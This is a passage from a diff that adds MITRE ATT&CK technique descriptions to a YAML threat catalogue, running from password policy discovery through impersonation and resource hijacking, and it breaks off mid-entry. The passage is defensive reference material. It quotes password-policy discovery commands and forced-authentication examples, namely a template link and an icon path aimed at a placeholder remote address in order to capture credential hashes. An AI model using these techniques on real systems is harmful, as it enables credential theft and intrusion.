+      policies are a way to enforce complex passwords that are difficult to guess
+      or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This
+      information may help the adversary to create a list of common passwords and
+      launch dictionary and/or brute force attacks which adheres to the policy (e.g.
+      if the minimum password length should be 8, then not trying passwords such as
+      ''pass123''; not checking for more than 3-4 passwords per account if the lockout
+      is set to 6 as to not lock out accounts).
+
+
+      Password policies can be set and discovered on Windows, Linux, and macOS systems
+      via various command shell utilities such as <code>net accounts (/domain)</code>,
+      <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>,
+      <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code>
+      (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password
+      Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      on network devices to discover password policy information (e.g. <code>show
+      aaa</code>, <code>show aaa common-criteria policy all</code>).(Citation: US-CERT-TA18-106A)
+
+
+      Password policies can be discovered in cloud environments using available APIs
+      such as <code>GetAccountPasswordPolicy</code> in AWS (Citation: AWS GetPasswordPolicy).
+
+      https://attack.mitre.org/techniques/T1201'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1546
+    name: T1546 - Event Triggered Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may establish persistence and/or elevate privileges
+      using system mechanisms that trigger execution based on specific events. Various
+      operating systems have means to monitor and subscribe to events such as logons
+      or other user activity such as running specific applications/binaries. Cloud
+      environments may also support various functions and services that monitor and
+      can be invoked in response to specific cloud events.(Citation: Backdooring an
+      AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft
+      DART Case Report 001)
+
+
+      Adversaries may abuse these mechanisms as a means of maintaining persistent
+      access to a victim via repeatedly executing malicious code. After gaining access
+      to a victim system, adversaries may create/modify event triggers to point to
+      malicious content that will be executed whenever the event trigger is invoked.(Citation:
+      FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
+
+
+      Since the execution can be proxied by an account with higher permissions, such
+      as SYSTEM or service accounts, an adversary may be able to abuse these triggered
+      execution mechanisms to escalate their privileges.
+
+      https://attack.mitre.org/techniques/T1546'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1187
+    name: T1187 - Forced Authentication
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather credential material by invoking or forcing
+      a user to automatically provide authentication information through a mechanism
+      in which they can intercept.
+
+
+      The Server Message Block (SMB) protocol is commonly used in Windows networks
+      for authentication and communication between systems for access to resources
+      and file sharing. When a Windows system attempts to connect to an SMB resource
+      it will automatically attempt to authenticate and send credential information
+      for the current user to the remote system. (Citation: Wikipedia Server Message
+      Block) This behavior is typical in enterprise environments so that users do
+      not need to enter credentials to access network resources.
+
+
+      Web Distributed Authoring and Versioning (WebDAV) is also typically used by
+      Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is
+      an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation:
+      Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
+
+
+      Adversaries may take advantage of this behavior to gain access to user account
+      hashes through forced SMB/WebDAV authentication. An adversary can send an attachment
+      to a user through spearphishing that contains a resource link to an external
+      server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)),
+      or place a specially crafted file on navigation path for privileged accounts
+      (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed
+      by victim(s). When the user''s system accesses the untrusted resource it will
+      attempt authentication and send information, including the user''s hashed credentials,
+      over SMB to the adversary controlled server. (Citation: GitHub Hashjacking)
+      With access to the credential hash, an adversary can perform off-line [Brute
+      Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to
+      plaintext credentials. (Citation: Cylance Redirect to SMB)
+
+
+      There are several different ways this can occur. (Citation: Osanda Stealing
+      NetNTLM Hashes) Some specifics from in-the-wild use include:
+
+
+      * A spearphishing attachment containing a document with a resource that is automatically
+      loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)).
+      The document can include, for example, a request similar to <code>file[:]//[remote
+      address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT
+      Energy Oct 2017)
+
+      * A modified .LNK or .SCF file with the icon filename pointing to an external
+      reference such as <code>\\[remote address]\pic.png</code> that will force the
+      system to load the resource when the icon is rendered to repeatedly gather credentials.
+      (Citation: US-CERT APT Energy Oct 2017)
+
+      https://attack.mitre.org/techniques/T1187'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1599
+    name: T1599 - Network Boundary Bridging
+    provider: MITRE ATT&CK
+    description: 'Adversaries may bridge network boundaries by compromising perimeter
+      network devices or internal devices responsible for network segmentation. Breaching
+      these devices may enable an adversary to bypass restrictions on traffic routing
+      that otherwise separate trusted and untrusted networks.
+
+
+      Devices such as routers and firewalls can be used to create boundaries between
+      trusted and untrusted networks.  They achieve this by restricting traffic types
+      to enforce organizational policy in an attempt to reduce the risk inherent in
+      such connections.  Restriction of traffic can be achieved by prohibiting IP
+      addresses, layer 4 protocol ports, or through deep packet inspection to identify
+      applications.  To participate with the rest of the network, these devices can
+      be directly addressable or transparent, but their mode of operation has no bearing
+      on how the adversary can bypass them when compromised.
+
+
+      When an adversary takes control of such a boundary device, they can bypass its
+      policy enforcement to pass normally prohibited traffic across the trust boundary
+      between the two separated networks without hinderance.  By achieving sufficient
+      rights on the device, an adversary can reconfigure the device to allow the traffic
+      they want, allowing them to then further achieve goals such as command and control
+      via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration
+      of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).
+      Adversaries may also target internal devices responsible for network segmentation
+      and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001)
+      to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the
+      cases where a border device separates two separate organizations, the adversary
+      can also facilitate lateral movement into new victim environments.
+
+      https://attack.mitre.org/techniques/T1599'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1486
+    name: T1486 - Data Encrypted for Impact
+    provider: MITRE ATT&CK
+    description: "Adversaries may encrypt data on target systems or on large numbers\
+      \ of systems in a network to interrupt availability to system and network resources.\
+      \ They can attempt to render stored data inaccessible by encrypting files or\
+      \ data on local and remote drives and withholding access to a decryption key.\
+      \ This may be done in order to extract monetary compensation from a victim in\
+      \ exchange for decryption or a decryption key (ransomware) or to render data\
+      \ permanently inaccessible in cases where the key is not saved or transmitted.(Citation:\
+      \ US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT\
+      \ NotPetya 2017)(Citation: US-CERT SamSam 2018)\n\nIn the case of ransomware,\
+      \ it is typical that common user files like Office documents, PDFs, images,\
+      \ videos, audio, text, and source code files will be encrypted (and often renamed\
+      \ and/or tagged with specific file markers). Adversaries may need to first employ\
+      \ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)\
+      \ or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in\
+      \ order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack\
+      \ Conti July 2020) In some cases, adversaries may encrypt critical system files,\
+      \ disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) \n\nTo maximize\
+      \ impact on the target organization, malware designed for encrypting data may\
+      \ have worm-like features to propagate across a network by leveraging other\
+      \ attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078),\
+      \ [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows\
+      \ Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye\
+      \ WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also\
+      \ leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001),\
+      \ such as changing victim wallpapers, or otherwise intimidate victims by sending\
+      \ ransom notes or other messages to connected printers (known as \"print bombing\"\
+      ).(Citation: NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage\
+      \ objects within compromised accounts may also be encrypted.(Citation: Rhino\
+      \ S3 Ransomware Part 1)\nhttps://attack.mitre.org/techniques/T1486"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1553
+    name: T1553 - Subvert Trust Controls
+    provider: MITRE ATT&CK
+    description: 'Adversaries may undermine security controls that will either warn
+      users of untrusted activity or prevent execution of untrusted programs. Operating
+      systems and security products may contain mechanisms to identify programs or
+      websites as possessing some level of trust. Examples of such features would
+      include a program being allowed to run because it is signed by a valid code
+      signing certificate, a program prompting the user with a warning because it
+      has an attribute set from being downloaded from the Internet, or getting an
+      indication that you are about to connect to an untrusted site.
+
+
+      Adversaries may attempt to subvert these trust mechanisms. The method adversaries
+      use will depend on the specific mechanism they seek to subvert. Adversaries
+      may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)
+      or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of
+      subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017)
+      Adversaries may also create or steal code signing certificates to acquire trust
+      on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec
+      Digital Certificates)
+
+      https://attack.mitre.org/techniques/T1553'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1573
+    name: T1573 - Encrypted Channel
+    provider: MITRE ATT&CK
+    description: 'Adversaries may employ a known encryption algorithm to conceal command
+      and control traffic rather than relying on any inherent protections provided
+      by a communication protocol. Despite the use of a secure algorithm, these implementations
+      may be vulnerable to reverse engineering if secret keys are encoded and/or generated
+      within malware samples/configuration files.
+
+      https://attack.mitre.org/techniques/T1573'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1056
+    name: T1056 - Input Capture
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use methods of capturing user input to obtain credentials
+      or collect information. During normal system usage, users often provide credentials
+      to various different locations, such as login pages/portals or system dialog
+      boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential
+      API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving
+      the user into providing input into what they believe to be a genuine service
+      (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
+
+      https://attack.mitre.org/techniques/T1056'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1203
+    name: T1203 - Exploitation for Client Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may exploit software vulnerabilities in client applications
+      to execute code. Vulnerabilities can exist in software due to unsecure coding
+      practices that can lead to unanticipated behavior. Adversaries can take advantage
+      of certain vulnerabilities through targeted exploitation for the purpose of
+      arbitrary code execution. Oftentimes the most valuable exploits to an offensive
+      toolkit are those that can be used to obtain code execution on a remote system
+      because they can be used to gain access to that system. Users will expect to
+      see files related to the applications they commonly used to do work, so they
+      are a useful target for exploit research and development because of their high
+      utility.
+
+
+      Several types exist:
+
+
+      ### Browser-based Exploitation
+
+
+      Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)
+      and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint
+      systems may be compromised through normal web browsing or from certain users
+      being targeted by links in spearphishing emails to adversary controlled sites
+      used to exploit the web browser. These often do not require an action by the
+      user for the exploit to be executed.
+
+
+      ### Office Applications
+
+
+      Common office and productivity applications such as Microsoft Office are also
+      targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious
+      files will be transmitted directly as attachments or through links to download
+      them. These require the user to open the document or file for the exploit to
+      run.
+
+
+      ### Common Third-party Applications
+
+
+      Other applications that are commonly seen or are part of the software deployed
+      in a target network may also be used for exploitation. Applications such as
+      Adobe Reader and Flash, which are common in enterprise environments, have been
+      routinely targeted by adversaries attempting to gain access to systems. Depending
+      on the software and nature of the vulnerability, some may be exploited in the
+      browser or require the user to open a file. For instance, some Flash exploits
+      have been delivered as objects within Microsoft Office documents.
+
+      https://attack.mitre.org/techniques/T1203'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1570
+    name: T1570 - Lateral Tool Transfer
+    provider: MITRE ATT&CK
+    description: 'Adversaries may transfer tools or other files between systems in
+      a compromised environment. Once brought into the victim environment (i.e., [Ingress
+      Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be
+      copied from one system to another to stage adversary tools or other files over
+      the course of an operation.
+
+
+      Adversaries may copy files between internal victim systems to support lateral
+      movement using inherent file sharing protocols such as file sharing over [SMB/Windows
+      Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network
+      shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation:
+      Unit42 LockerGoga 2019)
+
+
+      Files can also be transferred using native or otherwise present tools on the
+      victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095).
+      In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s
+      such as Dropbox or OneDrive to copy files from one machine to another via shared,
+      automatically synced folders.(Citation: Dropbox Malware Sync)
+
+      https://attack.mitre.org/techniques/T1570'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1095
+    name: T1095 - Non-Application Layer Protocol
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use an OSI non-application layer protocol for communication
+      between host and C2 server or among infected hosts within a network. The list
+      of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples
+      include use of network layer protocols, such as the Internet Control Message
+      Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol
+      (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled
+      protocols, such as Serial over LAN (SOL).
+
+
+      ICMP communication between hosts is one example.(Citation: Cisco Synful Knock
+      Evolution) Because ICMP is part of the Internet Protocol Suite, it is required
+      to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However,
+      it is not as commonly monitored as other Internet Protocols such as TCP or UDP
+      and may be used by adversaries to hide communications.
+
+      https://attack.mitre.org/techniques/T1095'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1012
+    name: T1012 - Query Registry
+    provider: MITRE ATT&CK
+    description: 'Adversaries may interact with the Windows Registry to gather information
+      about the system, configuration, and installed software.
+
+
+      The Registry contains a significant amount of information about the operating
+      system, configuration, software, and security.(Citation: Wikipedia Windows Registry)
+      Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075)
+      utility, though other means to access the Registry exist. Some of the information
+      may help adversaries to further their operation within a network. Adversaries
+      may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012)
+      during automated discovery to shape follow-on behaviors, including whether or
+      not the adversary fully infects the target and/or attempts specific actions.
+
+      https://attack.mitre.org/techniques/T1012'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1030
+    name: T1030 - Data Transfer Size Limits
+    provider: MITRE ATT&CK
+    description: 'An adversary may exfiltrate data in fixed size chunks instead of
+      whole files or limit packet sizes below certain thresholds. This approach may
+      be used to avoid triggering network data transfer threshold alerts.
+
+      https://attack.mitre.org/techniques/T1030'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1499
+    name: T1499 - Endpoint Denial of Service
+    provider: MITRE ATT&CK
+    description: 'Adversaries may perform Endpoint Denial of Service (DoS) attacks
+      to degrade or block the availability of services to users. Endpoint DoS can
+      be performed by exhausting the system resources those services are hosted on
+      or exploiting the system to cause a persistent crash condition. Example services
+      include websites, email services, DNS, and web-based applications. Adversaries
+      have been observed conducting DoS attacks for political purposes(Citation: FireEye
+      OpPoisonedHandover February 2016) and to support other malicious activities,
+      including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism,
+      and extortion.(Citation: Symantec DDoS October 2014)
+
+
+      An Endpoint DoS denies the availability of a service without saturating the
+      network used to provide access to the service. Adversaries can target various
+      layers of the application stack that is hosted on the system used to provide
+      the service. These layers include the Operating Systems (OS), server applications
+      such as web servers, DNS servers, databases, and the (typically web-based) applications
+      that sit on top of them. Attacking each layer requires different techniques
+      that take advantage of bottlenecks that are unique to the respective components.
+      A DoS attack may be generated by a single system or multiple systems spread
+      across the internet, which is commonly referred to as a distributed DoS (DDoS).
+
+
+      To perform DoS attacks against endpoint resources, several aspects apply to
+      multiple methods, including IP address spoofing and botnets.
+
+
+      Adversaries may use the original IP address of an attacking system, or spoof
+      the source IP address to make the attack traffic more difficult to trace back
+      to the attacking system or to enable reflection. This can increase the difficulty
+      defenders have in defending against the attack by reducing or eliminating the
+      effectiveness of filtering by the source address on network defense devices.
+
+
+      Botnets are commonly used to conduct DDoS attacks against networks and services.
+      Large botnets can generate a significant amount of traffic from systems spread
+      across the global internet. Adversaries may have the resources to build out
+      and control their own botnet infrastructure or may rent time on an existing
+      botnet to conduct an attack. In some of the worst cases for DDoS, so many systems
+      are used to generate requests that each one only needs to send out a small amount
+      of traffic to produce enough volume to exhaust the target''s resources. In such
+      circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly
+      difficult. Botnets have been used in some of the most high-profile DDoS attacks,
+      such as the 2012 series of incidents that targeted major US banks.(Citation:
+      USNYAG IranianBotnet March 2016)
+
+
+      In cases where traffic manipulation is used, there may be points in the global
+      network (such as high traffic gateway routers) where packets can be altered
+      and cause legitimate clients to execute code that directs network packets toward
+      a target in high volume. This type of capability was previously used for the
+      purposes of web censorship where client HTTP traffic was modified to include
+      a reference to JavaScript that generated the DDoS code to overwhelm target web
+      servers.(Citation: ArsTechnica Great Firewall of China)
+
+
+      For attacks attempting to saturate the providing network, see [Network Denial
+      of Service](https://attack.mitre.org/techniques/T1498).
+
+      https://attack.mitre.org/techniques/T1499'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1614
+    name: T1614 - System Location Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather information in an attempt to calculate the
+      geographical location of a victim host. Adversaries may use the information
+      from [System Location Discovery](https://attack.mitre.org/techniques/T1614)
+      during automated discovery to shape follow-on behaviors, including whether or
+      not the adversary fully infects the target and/or attempts specific actions.
+
+
+      Adversaries may attempt to infer the location of a system using various system
+      checks, such as time zone, keyboard layout, and/or language settings.(Citation:
+      FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer
+      RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code>
+      can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker
+      2020) In cloud environments, an instance''s availability zone may also be discovered
+      by accessing the instance metadata service from the instance.(Citation: AWS
+      Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+
+      Adversaries may also attempt to infer the location of a victim host using IP
+      addressing, such as via online geolocation IP-lookup services.(Citation: Securelist
+      Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+
+      https://attack.mitre.org/techniques/T1614'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1197
+    name: T1197 - BITS Jobs
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse BITS jobs to persistently execute code and
+      perform various background tasks. Windows Background Intelligent Transfer Service
+      (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through
+      [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation:
+      Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters,
+      messengers, and other applications preferred to operate in the background (using
+      available idle bandwidth) without interrupting other networked applications.
+      File transfer tasks are implemented as BITS jobs, which contain a queue of one
+      or more file operations.
+
+
+      The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+      and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation:
+      Microsoft BITS)(Citation: Microsoft BITSAdmin)
+
+
+      Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)),
+      execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)).
+      BITS tasks are self-contained in the BITS job database, without new files or
+      registry modifications, and often permitted by host firewalls.(Citation: CTU
+      BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation:
+      Symantec BITS May 2007) BITS enabled execution may also enable persistence by
+      creating long-standing jobs (the default maximum lifetime is 90 days and extendable)
+      or invoking an arbitrary program when a job completes or errors (including after
+      system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware
+      June 2016)
+
+
+      BITS upload functionalities can also be used to perform [Exfiltration Over Alternative
+      Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware
+      June 2016)
+
+      https://attack.mitre.org/techniques/T1197'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1656
+    name: T1656 - Impersonation
+    provider: MITRE ATT&CK
+    description: "Adversaries may impersonate a trusted person or organization in\
+      \ order to persuade and trick a target into performing some action on their\
+      \ behalf. For example, adversaries may communicate with victims (via [Phishing\
+      \ for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566),\
+      \ or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while\
+      \ impersonating a known sender such as an executive, colleague, or third-party\
+      \ vendor. Established trust can then be leveraged to accomplish an adversary\u2019\
+      s ultimate goals, possibly against multiple victims. \n \nIn many cases of business\
+      \ email compromise or email fraud campaigns, adversaries use impersonation to\
+      \ defraud victims -- deceiving them into sending money or divulging information\
+      \ that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\
+      \nAdversaries will often also use social engineering techniques such as manipulative\
+      \ and persuasive language in email subject lines and body text such as `payment`,\
+      \ `request`, or `urgent` to push the victim to act quickly before malicious\
+      \ activity is detected. These campaigns are often specifically targeted against\
+      \ people who, due to job roles and/or accesses, can carry out the adversary\u2019\
+      s goal.\u202F\u202F \n \nImpersonation is typically preceded by reconnaissance\
+      \ techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589)\
+      \ and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591)\
+      \ as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001))\
+      \ to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere\
+      \ is the potential for multiple victims in campaigns involving impersonation.\
+      \ For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586)\
+      \ targeting one organization which can then be used to support impersonation\
+      \ against other entities.(Citation: VEC)\nhttps://attack.mitre.org/techniques/T1656"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1132
+    name: T1132 - Data Encoding
+    provider: MITRE ATT&CK
+    description: 'Adversaries may encode data to make the content of command and control
+      traffic more difficult to detect. Command and control (C2) information can be
+      encoded using a standard data encoding system. Use of data encoding may adhere
+      to existing protocol specifications and includes use of ASCII, Unicode, Base64,
+      MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia
+      Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data
+      encoding systems may also result in data compression, such as gzip.
+
+      https://attack.mitre.org/techniques/T1132'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1598
+    name: T1598 - Phishing for Information
+    provider: MITRE ATT&CK
+    description: "Adversaries may send phishing messages to elicit sensitive information\
+      \ that can be used during targeting. Phishing for information is an attempt\
+      \ to trick targets into divulging information, frequently credentials or other\
+      \ actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566)\
+      \ in that the objective is gathering data from the victim rather than executing\
+      \ malicious code.\n\nAll forms of phishing are electronically delivered social\
+      \ engineering. Phishing can be targeted, known as spearphishing. In spearphishing,\
+      \ a specific individual, company, or industry will be targeted by the adversary.\
+      \ More generally, adversaries can conduct non-targeted phishing, such as in\
+      \ mass credential harvesting campaigns.\n\nAdversaries may also try to obtain\
+      \ information directly through the exchange of emails, instant messages, or\
+      \ other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation:\
+      \ TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation:\
+      \ GitHub Phishery) Victims may also receive phishing messages that direct them\
+      \ to call a phone number where the adversary attempts to collect confidential\
+      \ information.(Citation: Avertium callback phishing)\n\nPhishing for information\
+      \ frequently involves social engineering techniques, such as posing as a source\
+      \ with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)\
+      \ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or\
+      \ sending multiple, seemingly urgent messages. Another way to accomplish this\
+      \ is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the\
+      \ sender which can be used to fool both the human recipient as well as automated\
+      \ security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information\
+      \ may also involve evasive techniques, such as removing or manipulating emails\
+      \ or metadata/headers from compromised accounts being abused to send messages\
+      \ (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:\
+      \ Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\n\
+      https://attack.mitre.org/techniques/T1598"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1496
+    name: T1496 - Resource Hijacking
+    provider: MITRE ATT&CK
+    description: "Adversaries may leverage the resources of co-opted systems to complete\
+      \ resource-intensive tasks, which may impact system and/or hosted service availability.\
+      \ \n\nOne common purpose for Resource Hijacking is to validate transactions\
+      \ of cryptocurrency networks and earn virtual currency. Adversaries may consume\
+      \ enough system resources to negatively impact and/or cause affected machines\
+      \ to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\
+      \ Servers and cloud-based systems are common targets because of the high potential\
+      \ for available resources, but user endpoint systems may also be compromised\
+      \ and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit\
+      \ - Unused AWS Regions) Containerized environments may also be targeted due\
+      \ to the ease of deployment via exposed APIs and the potential for scaling mining\
+      \ activities by deploying or compromising multiple containers within an environment\
+      \ or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed\
+      \ Docker APIs)\n\nAdditionally, some cryptocurrency mining malware identify\
+      \ then kill off processes for competing malware to ensure it\u2019s not competing\
+      \ for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries\
+      \ may also use malware that leverages a system's network bandwidth as part of\
+      \ a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)\
+      \ campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,\
+      \ they may engage in proxyjacking by selling use of the victims' network bandwidth\
+      \ and IP address to proxyware services.(Citation: Sysdig Proxyjacking)\nhttps://attack.mitre.org/techniques/T1496"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1585
+    name: T1585 - Establish Accounts
+    provider: MITRE ATT&CK
+    description: 'Adversaries may create and cultivate accounts with services that
+      can be used during targeting. Adversaries can create accounts that can be used
+      to build a persona to further operations. Persona development consists of the
+      development of public information, presence, history and appropriate affiliations.
+      This development could be applied to social media, website, or other publicly
+      available information that could be referenced and scrutinized for legitimacy
+      over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation:
+      BlackHatRobinSage)
+
+
+      For operations incorporating social engineering, the utilization of an online
+      persona may be important. These personas may be fictitious or impersonate real
+      people. The persona may exist on a single site or across multiple sites (ex:
+      Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing
+      a persona may require development of additional documentation to make them seem
+      real. This could include filling out profile information, developing social
+      networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+
+
+      Establishing accounts can also include the creation of accounts with email providers,
+      which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+      or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant
+      APT1)
+
+      https://attack.mitre.org/techniques/T1585'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1588
+    name: T1588 - Obtain Capabilities
+    provider: MITRE ATT&CK
+    description: 'Adversaries may buy and/or steal capabilities that can be used during
+      targeting. Rather than developing their own capabilities in-house, adversaries
+      may purchase, freely download, or steal them. Activities may include the acquisition
+      of malware, software (including licenses), exploits, certificates, and information
+      relating to vulnerabilities. Adversaries may obtain capabilities to support
+      their operations throughout numerous phases of the adversary lifecycle.
+
+
+      In addition to downloading free malware, software, and exploits from the internet,
+      adversaries may purchase these capabilities from third-party entities. Third-party
+      entities can include technology companies that specialize in malware and exploits,
+      criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation:
+      PegasusCitizenLab)
+
+
+      In addition to purchasing capabilities, adversaries may steal capabilities from
+      third-party entities (including other adversaries). This can include stealing
+      software licenses, malware, SSL/TLS and code-signing certificates, or raiding
+      closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)
+
+      https://attack.mitre.org/techniques/T1588'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1569
+    name: T1569 - System Services
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse system services or daemons to execute commands
+      or programs. Adversaries can execute malicious content by interacting with or
+      creating services either locally or remotely. Many services are set to run at
+      boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)),
+      but adversaries can also abuse services for one-time or temporary execution.
+
+      https://attack.mitre.org/techniques/T1569'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1650
+    name: T1650 - Acquire Access
+    provider: MITRE ATT&CK
+    description: "Adversaries may purchase or otherwise acquire an existing access\
+      \ to a target system or network. A variety of online services and initial access\
+      \ broker networks are available to sell access to previously compromised systems.(Citation:\
